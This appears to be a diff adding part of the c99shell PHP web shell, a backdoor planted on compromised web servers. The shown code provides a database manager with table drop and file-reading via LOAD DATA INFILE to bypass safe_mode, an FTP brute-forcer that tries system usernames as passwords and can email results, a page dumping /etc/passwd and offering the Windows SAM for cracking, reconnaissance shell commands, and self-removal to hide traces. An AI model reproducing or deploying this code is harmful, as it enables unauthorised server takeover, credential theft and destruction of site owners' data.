+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
